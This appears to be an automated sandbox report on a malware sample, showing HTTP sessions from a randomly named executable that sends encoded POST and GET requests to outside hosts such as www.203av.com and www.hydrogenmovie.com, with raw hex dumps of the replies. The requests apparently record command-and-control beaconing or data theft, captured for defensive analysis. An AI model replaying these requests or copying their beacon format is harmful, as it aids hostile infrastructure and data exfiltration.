                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              31192.168.2.54976145.207.12.95803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:18:12.417527914 CEST1807OUTPOST /dy54/ HTTP/1.1
                                              Host: www.203av.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.203av.com
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 1244
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.203av.com/dy54/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Raw: 34 64 56 34 33 74 41 3d 71 54 48 68 4d 6e 48 53 74 31 46 6b 70 30 76 58 6b 42 49 36 46 4f 6e 56 4a 50 68 70 73 59 6a 73 64 48 76 4a 63 31 41 71 42 59 38 68 68 38 72 76 4f 72 70 33 4e 79 62 53 4c 47 51 2f 4d 6f 34 70 47 65 4c 4e 57 6b 4a 43 79 4d 6d 6b 75 4d 72 42 57 46 46 4d 6d 56 4f 45 43 5a 4b 73 30 78 31 71 73 76 56 45 2f 71 4d 56 58 76 35 74 2f 31 77 4e 55 67 4f 74 6b 30 72 42 38 37 64 70 39 74 4d 4c 38 4a 7a 42 52 30 48 7a 57 61 61 43 41 6f 4e 4a 64 74 45 2b 4c 75 6e 44 73 4b 2f 59 59 43 73 38 7a 43 45 68 4d 63 48 7a 33 6d 42 6c 34 35 50 78 75 50 48 46 78 6a 61 73 61 4f 62 68 4b 4c 6c 79 2f 67 52 2b 45 57 39 79 78 46 5a 66 57 72 65 67 59 78 56 58 37 39 4a 59 71 6d 7a 4f 57 68 58 6d 34 70 78 6c 6c 58 53 7a 68 35 75 45 70 6f 6a 6f 4c 54 42 35 55 46 57 39 61 51 62 45 76 2b 71 5a 6f 73 42 4f 45 6e 7a 2f 64 73 6b 45 6a 73 5a 6a 79 67 74 2f 34 65 39 2b 6b 2f 58 33 61 52 5a 6c 4e 30 58 6d 6f 50 66 6f 55 31 4b 33 6b 4c 48 62 51 48 32 38 37 6e 57 50 70 59 72 53 71 5a 41 77 51 32 66 51 67 62 6d 33 64 70 [TRUNCATED]
                                              Data Ascii: 4dV43tA=qTHhMnHSt1Fkp0vXkBI6FOnVJPhpsYjsdHvJc1AqBY8hh8rvOrp3NybSLGQ/Mo4pGeLNWkJCyMmkuMrBWFFMmVOECZKs0x1qsvVE/qMVXv5t/1wNUgOtk0rB87dp9tML8JzBR0HzWaaCAoNJdtE+LunDsK/YYCs8zCEhMcHz3mBl45PxuPHFxjasaObhKLly/gR+EW9yxFZfWregYxVX79JYqmzOWhXm4pxllXSzh5uEpojoLTB5UFW9aQbEv+qZosBOEnz/dskEjsZjygt/4e9+k/X3aRZlN0XmoPfoU1K3kLHbQH287nWPpYrSqZAwQ2fQgbm3dpcDVvyGnuLvC0CvevuXnJQCc43AhwFcDtDOgYG/B/QaW4Zg7JVgtC+jFMhlmQAlTpXKU3nlbVuM/BQZkpaHTUc/iSpaXkTHr9KSivzqSCi55RCf0XYW2YtVOpIS/4srxhWjdTK+JgHDwS9qC7UX3qGpx0KK3O0I0w1RztZuvDtinCr/cn8lcvwaDX4hI0k5p7ahrdBEg4jgU2vr1R/i4/RtSIgZnVW/oDfidyITosEB1pBu22dtECkCj5c2vLB6KvTMCdnnqdP/wBwTkiospDPxlOp2diFkuli4ynbGqJTKEV9Bpg2lpDrODKQ2ZxcSl8qXXwvu/F+5TxFcZ8YLHkyVIFWEV4EInBccETj8vgWbIqSCOFQ8IZsj+1hfYuFm8iFPv4Mif9OFYLUbA303Q1GE4uBuKeXt5aKrgd2lewXp75CW21Y4jP3YgLuPNFzE9PqQ0Pv6EsJd1bJ8LH56PHQXTawKLQ98URl08hTa8kUbfOVtwrUtaGzYlGjvO6biCN5t2AW1+zQZNoFD4mok9uNfIHVDhWHg5xLubdjzjW9lhqkJg2K4zElz1zvHA/7oTBUyvEaGIEjgk9C/Ac/LlL3Y1ZQlVySYqCD31u9GI1tDgNoeZLBEM5hRHIaDijUhywm6KAF0A0ggGQEMR1kD7qOWrFH2cIGABLDV [TRUNCATED]
                                              Jul 1, 2024 16:18:13.333486080 CEST492INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=us-ascii
                                              Server: Microsoft-HTTPAPI/2.0
                                              Date: Mon, 01 Jul 2024 14:18:12 GMT
                                              Connection: close
                                              Content-Length: 315
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              32192.168.2.54976245.207.12.95803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:18:14.951992989 CEST524OUTGET /dy54/?3hkl=slNhbLXpBjO8vl&4dV43tA=nRvBPTzlzGF4n3rt1QttF4nrN+JQ8KTHZyrUcXxxKI8o38P7J7J9FRPNIVc1TZhiGrLUOXxy1Ju1j9DdTlskr3z+VILb9gUTk9d2pc0Ee/hjvnETVBSGl3uD2JlRjMFEvQ== HTTP/1.1
                                              Host: www.203av.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Jul 1, 2024 16:18:15.845623016 CEST492INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=us-ascii
                                              Server: Microsoft-HTTPAPI/2.0
                                              Date: Mon, 01 Jul 2024 14:18:14 GMT
                                              Connection: close
                                              Content-Length: 315
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              33192.168.2.54976381.95.96.29803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:18:21.028650999 CEST794OUTPOST /vi6c/ HTTP/1.1
                                              Host: www.hydrogenmovie.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.hydrogenmovie.com
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 208
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.hydrogenmovie.com/vi6c/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Raw: 34 64 56 34 33 74 41 3d 57 65 33 65 49 30 41 4b 34 4c 47 32 30 32 6d 2f 31 76 4a 66 39 37 5a 7a 65 36 30 30 39 75 4a 38 74 70 53 57 77 36 66 76 68 33 6f 2f 6e 45 71 43 51 4f 54 33 43 2f 4f 49 45 79 42 33 4b 66 48 64 65 4f 67 4d 35 32 49 57 68 42 6c 6b 72 6c 33 2f 74 68 45 4d 65 67 62 63 36 4b 4c 43 58 76 50 54 73 48 62 6c 77 55 62 65 49 7a 36 62 6a 6c 77 7a 71 59 37 50 57 48 56 61 54 2f 68 62 45 34 68 6d 6f 63 49 44 77 64 39 57 52 43 67 32 2b 45 51 78 38 66 42 63 58 34 4f 52 55 38 69 4d 45 66 46 56 73 45 74 65 48 5a 58 51 4b 42 58 77 70 46 54 46 51 61 4d 2f 58 4d 50 70 6a 39 5a 48 34 37 52 33 79 64 38 52 34 6f 4d 3d
                                              Data Ascii: 4dV43tA=We3eI0AK4LG202m/1vJf97Zze6009uJ8tpSWw6fvh3o/nEqCQOT3C/OIEyB3KfHdeOgM52IWhBlkrl3/thEMegbc6KLCXvPTsHblwUbeIz6bjlwzqY7PWHVaT/hbE4hmocIDwd9WRCg2+EQx8fBcX4ORU8iMEfFVsEteHZXQKBXwpFTFQaM/XMPpj9ZH47R3yd8R4oM=
                                              Jul 1, 2024 16:18:21.713047981 CEST1236INHTTP/1.1 200 OK
                                              Date: Mon, 01 Jul 2024 14:18:21 GMT
                                              Server: Apache
                                              Vary: Accept-Encoding
                                              Content-Encoding: gzip
                                              Content-Length: 4981
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 5c cd 73 1b b7 92 3f 2b 55 f9 1f 10 ba 1c 59 b5 02 bf f4 2d 4b ca 73 6c e5 3d af e3 8f 8d bc 49 6d 2e 2e cc 0c 48 42 9c 01 e6 01 33 14 c9 3c df 77 ab d6 f7 cd fa b2 3a fa a0 ca 61 6f af ea e5 42 e9 ff da 06 30 43 ce 0c 87 12 a9 8f ac f3 e1 84 d4 0c 06 e8 6e 00 dd bf ee 06 c0 d9 eb 44 81 7f f0 e9 27 9f 7e b2 d7 a1 c4 83 ab a5 3d 87 28 8a 3a 92 b6 f6 2b b5 8a 29 09 68 44 90 db 21 52 d1 68 bf 12 47 2d bc 5d 31 8d 96 f6 22 16 f9 f4 e0 d1 e3 d7 4f bf 3d 44 cd f5 55 a4 aa b2 2a aa 7b 35 fb c0 56 32 ed 39 09 e8 7e a5 c7 e8 49 28 64 54 41 ae e0 11 e5 40 ef 84 79 51 67 df a3 3d e6 52 6c 6e 56 11 e3 2c 62 c4 c7 ca 25 3e dd 6f 64 c4 b0 64 9e d1 c1 89 90 9e ca 90 99 aa f3 84 2a 57 b2 30 62 82 67 aa 4d 89 3a d5 ee 51 1c 75 84 5c a8 c9 cb 13 4e 2f 6d 81 d2 f1 fa 0c 63 d4 22 d0 55 c1 91 8a 88 8c 10 c6 86 9a cf 78 17 49 ea ef 57 48 18 fa 14 47 22 76 3b 58 d7 ab 20 c5 86 54 ed 57 36 b6 fa 1b 5b 95 64 6a 3a 51 14 aa dd 5a ad 1d b3 2a 71 23 d6 a3 cd f5 aa 3b ac b1 a0 5d d3 ad 6a a4 b9 [TRUNCATED]
                                              Data Ascii: \s?+UY-Ksl=Im..HB3<w:aoB0CnD'~=(:+)hD!RhG-]1"O=DU*{5V29~I(dTA@yQg=RlnV,b%>odd*W0bgM:Qu\N/mc"UxIWHG"v;X TW6[dj:QZ*q#;]j-6!oWYoo_VG~1phs6}utF}&\-nlh-2S4nX@+Y;ux]Zv=w6;jnchZNf|E3h_3>~ks|%K@r:4LhS4j|H"5C5*5?EjxZ/z[6]kZ[Avq^m\BD#D"IB}h`rB.Wu.W\@4M.cP-$,}=`.X.KAJDm!>%!S~"!}uv-g>k*vtLJUA K~)wr*QGTQ5B.&RR-,G=,B[UC|iaQdLoFDu^;C=eN~g##AU@#*QqYUh@!P4Z4X*]X#m}QWHxA0vc mD6aM [TRUNCATED]
                                              Jul 1, 2024 16:18:21.713067055 CEST1236INData Raw: ec f3 94 66 59 95 94 af a5 51 2e 4b bd 5c 10 68 b2 50 97 1a f0 a4 94 90 ad 90 d0 2a 1b 88 6c 2b 4f 8a d0 13 27 1c 07 94 c7 49 1b 8f a9 d0 27 a0 06 2d 9f 26 cc f5 15 f6 98 a4 ae 9d 21 98 db 38 b0 f3 0f 4a 24 61 ba 40 20 18 0f 25 7c e6 a1 7b f5 ba
                                              Data Ascii: fYQ.K\hP*l+O'I'-&!8J$a@ %|{MdB%DhG4uI\F:qm)@CpJ:B1hUnJ6J|}J&]k*$V\+L.JKLs)\i[=C*]H3/hY^:_bmM,C/#mE/isb
                                              Jul 1, 2024 16:18:21.713078976 CEST1236INData Raw: 01 2e 08 14 01 fe 8e 3e 70 a2 95 1d 1d 53 34 84 e4 a6 cd 14 e8 4f 8f f0 d1 29 0a 25 74 e8 e2 47 ea 71 e6 46 bd d1 59 80 6c 03 d1 1b 7d e8 08 a4 a3 bf d1 a9 1f 5f cd b0 32 39 c3 a1 79 55 f7 6a e1 35 2d a2 54 33 7c 90 a1 10 6d 5f a6 48 76 5b 4b 4f
                                              Data Ascii: .>pS4O)%tGqFYl}_29yUj5-T3|m_Hv[KO<,_HR|-cJ99X7v\90wNz}p[*o55eme-t_&-dSwx40s"YBi6 fIH5@^
                                              Jul 1, 2024 16:18:21.713089943 CEST1236INData Raw: d1 63 02 38 d2 15 3e 8c e5 31 e3 00 29 d0 45 bd 1d 31 ce 4c aa e8 95 08 04 84 3c 63 6e cf a1 b3 29 3b 88 8c 44 31 fe b1 c3 31 30 12 84 c2 04 37 03 9d d9 68 10 84 ac a6 27 7c ca 45 9c 04 3b a2 07 97 c4 93 54 c5 1f 1b 54 15 53 9b a4 cf 46 ec e4 fa
                                              Data Ascii: c8>1)E1L<cn);D1107h'|E;TTSF+|OtAM~8::||)4$"fA>&z,@jD<S@6qeJ1R8zP8p8en|h_F-"K<y,9!q
                                              Jul 1, 2024 16:18:21.713099003 CEST237INData Raw: a8 0a 26 7e e8 53 7d f9 e5 e0 a9 f7 60 39 fd 29 d8 f2 4a d5 fc 32 fa 35 ed 47 68 1f 9d 30 ee 89 93 aa 2f ec 6b f6 aa 69 35 f4 b7 bf a1 8a 39 d6 92 09 e4 ec bb 2e 7a 44 a2 f4 97 c3 af cd cf 95 81 ce 4c be d9 1f 1e 27 ef eb ca 12 98 a7 a9 89 cb 96
                                              Data Ascii: &~S}`9)J25Gh0/ki59.zDL';wz4*j>=J}UbG>t>KdMX4X*O*w,.$fIeIEAR_oDoNsW$w31Y


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              34192.168.2.54976481.95.96.29803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:18:23.559108973 CEST814OUTPOST /vi6c/ HTTP/1.1
                                              Host: www.hydrogenmovie.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.hydrogenmovie.com
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 228
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.hydrogenmovie.com/vi6c/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Raw: 34 64 56 34 33 74 41 3d 57 65 33 65 49 30 41 4b 34 4c 47 32 30 57 32 2f 33 4f 4a 66 37 62 5a 30 48 4b 30 30 6d 65 4a 77 74 70 65 57 77 37 61 71 6d 46 4d 2f 69 52 57 43 52 4c 7a 33 48 2f 4f 49 4c 53 42 2b 48 2f 48 43 65 4f 73 45 35 32 45 57 68 42 68 6b 72 6e 66 2f 74 57 51 50 66 77 62 43 79 71 4c 36 4a 66 50 54 73 48 62 6c 77 55 66 34 49 79 53 62 6a 31 41 7a 73 35 37 4d 49 33 56 5a 61 66 68 62 58 6f 68 71 6f 63 49 68 77 59 5a 34 52 45 73 32 2b 47 49 78 39 4b 31 54 64 34 4f 62 62 63 6a 65 41 4b 77 45 67 45 67 53 50 59 4f 43 53 43 7a 6d 68 54 2b 76 4b 34 45 58 45 73 6a 52 7a 75 52 77 70 4c 77 65 6f 2b 73 68 6d 2f 62 6e 7a 34 7a 65 2b 39 50 36 4e 33 68 5a 63 6b 68 33 42 74 6e 34
                                              Data Ascii: 4dV43tA=We3eI0AK4LG20W2/3OJf7bZ0HK00meJwtpeWw7aqmFM/iRWCRLz3H/OILSB+H/HCeOsE52EWhBhkrnf/tWQPfwbCyqL6JfPTsHblwUf4IySbj1Azs57MI3VZafhbXohqocIhwYZ4REs2+GIx9K1Td4ObbcjeAKwEgEgSPYOCSCzmhT+vK4EXEsjRzuRwpLweo+shm/bnz4ze+9P6N3hZckh3Btn4
                                              Jul 1, 2024 16:18:24.248047113 CEST1236INHTTP/1.1 200 OK
                                              Date: Mon, 01 Jul 2024 14:18:24 GMT
                                              Server: Apache
                                              Vary: Accept-Encoding
                                              Content-Encoding: gzip
                                              Content-Length: 4981
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 5c cd 73 1b b7 92 3f 2b 55 f9 1f 10 ba 1c 59 b5 02 bf f4 2d 4b ca 73 6c e5 3d af e3 8f 8d bc 49 6d 2e 2e cc 0c 48 42 9c 01 e6 01 33 14 c9 3c df 77 ab d6 f7 cd fa b2 3a fa a0 ca 61 6f af ea e5 42 e9 ff da 06 30 43 ce 0c 87 12 a9 8f ac f3 e1 84 d4 0c 06 e8 6e 00 dd bf ee 06 c0 d9 eb 44 81 7f f0 e9 27 9f 7e b2 d7 a1 c4 83 ab a5 3d 87 28 8a 3a 92 b6 f6 2b b5 8a 29 09 68 44 90 db 21 52 d1 68 bf 12 47 2d bc 5d 31 8d 96 f6 22 16 f9 f4 e0 d1 e3 d7 4f bf 3d 44 cd f5 55 a4 aa b2 2a aa 7b 35 fb c0 56 32 ed 39 09 e8 7e a5 c7 e8 49 28 64 54 41 ae e0 11 e5 40 ef 84 79 51 67 df a3 3d e6 52 6c 6e 56 11 e3 2c 62 c4 c7 ca 25 3e dd 6f 64 c4 b0 64 9e d1 c1 89 90 9e ca 90 99 aa f3 84 2a 57 b2 30 62 82 67 aa 4d 89 3a d5 ee 51 1c 75 84 5c a8 c9 cb 13 4e 2f 6d 81 d2 f1 fa 0c 63 d4 22 d0 55 c1 91 8a 88 8c 10 c6 86 9a cf 78 17 49 ea ef 57 48 18 fa 14 47 22 76 3b 58 d7 ab 20 c5 86 54 ed 57 36 b6 fa 1b 5b 95 64 6a 3a 51 14 aa dd 5a ad 1d b3 2a 71 23 d6 a3 cd f5 aa 3b ac b1 a0 5d d3 ad 6a a4 b9 [TRUNCATED]
                                              Data Ascii: \s?+UY-Ksl=Im..HB3<w:aoB0CnD'~=(:+)hD!RhG-]1"O=DU*{5V29~I(dTA@yQg=RlnV,b%>odd*W0bgM:Qu\N/mc"UxIWHG"v;X TW6[dj:QZ*q#;]j-6!oWYoo_VG~1phs6}utF}&\-nlh-2S4nX@+Y;ux]Zv=w6;jnchZNf|E3h_3>~ks|%K@r:4LhS4j|H"5C5*5?EjxZ/z[6]kZ[Avq^m\BD#D"IB}h`rB.Wu.W\@4M.cP-$,}=`.X.KAJDm!>%!S~"!}uv-g>k*vtLJUA K~)wr*QGTQ5B.&RR-,G=,B[UC|iaQdLoFDu^;C=eN~g##AU@#*QqYUh@!P4Z4X*]X#m}QWHxA0vc mD6aM [TRUNCATED]
                                              Jul 1, 2024 16:18:24.248069048 CEST1236INData Raw: ec f3 94 66 59 95 94 af a5 51 2e 4b bd 5c 10 68 b2 50 97 1a f0 a4 94 90 ad 90 d0 2a 1b 88 6c 2b 4f 8a d0 13 27 1c 07 94 c7 49 1b 8f a9 d0 27 a0 06 2d 9f 26 cc f5 15 f6 98 a4 ae 9d 21 98 db 38 b0 f3 0f 4a 24 61 ba 40 20 18 0f 25 7c e6 a1 7b f5 ba
                                              Data Ascii: fYQ.K\hP*l+O'I'-&!8J$a@ %|{MdB%DhG4uI\F:qm)@CpJ:B1hUnJ6J|}J&]k*$V\+L.JKLs)\i[=C*]H3/hY^:_bmM,C/#mE/isb
                                              Jul 1, 2024 16:18:24.248081923 CEST448INData Raw: 01 2e 08 14 01 fe 8e 3e 70 a2 95 1d 1d 53 34 84 e4 a6 cd 14 e8 4f 8f f0 d1 29 0a 25 74 e8 e2 47 ea 71 e6 46 bd d1 59 80 6c 03 d1 1b 7d e8 08 a4 a3 bf d1 a9 1f 5f cd b0 32 39 c3 a1 79 55 f7 6a e1 35 2d a2 54 33 7c 90 a1 10 6d 5f a6 48 76 5b 4b 4f
                                              Data Ascii: .>pS4O)%tGqFYl}_29yUj5-T3|m_Hv[KO<,_HR|-cJ99X7v\90wNz}p[*o55eme-t_&-dSwx40s"YBi6 fIH5@^
                                              Jul 1, 2024 16:18:24.248126984 CEST1236INData Raw: 6f cf ff fb e2 bf 9e be 9e 8a cd 0a fd cb 0e a1 0e 11 9f 7a 29 a5 c4 65 20 33 b0 fb 95 6c 82 93 6b 75 42 9d 99 8d 9a 8d 89 cd d4 b4 d8 37 f5 03 e6 7b 1a 09 2e c3 fb ab f1 fa 0a 5c 46 28 73 93 4c 91 85 e5 19 10 33 e9 73 61 39 05 9a 61 97 ea dd d6
                                              Data Ascii: oz)e 3lkuB7{.\F(sL3sa9al4Vj^Qu]YS25,Csa,.dFjY*udXXkT$4'eZ"VY6JV<5AAZ>2#o|
                                              Jul 1, 2024 16:18:24.248239040 CEST1025INData Raw: c8 b1 5f b1 07 19 12 6a 02 0c 11 a2 5a 57 6f 0b 33 6c e7 16 37 d7 d3 9d 4d b7 43 dd 2e 20 6c 36 69 34 5b e5 a5 42 a5 bb 77 97 48 61 1a 6b 19 20 0c bd 52 88 ac 26 18 b0 7c 89 4c 45 30 45 5d 13 65 4e 12 15 b0 34 0f e8 7a 53 d9 6e 1a 13 a9 b3 e3 14
                                              Data Ascii: _jZWo3l7MC. l6i4[BwHak R&|LE0E]eN4zSntlfL21.!"4}xrXaHv0?)TK?1~>:3$gp1 -5?<})4n?{SyKbJ%D3fr^=w/


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              35192.168.2.54976581.95.96.29803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:18:26.091989994 CEST1831OUTPOST /vi6c/ HTTP/1.1
                                              Host: www.hydrogenmovie.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.hydrogenmovie.com
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 1244
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.hydrogenmovie.com/vi6c/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
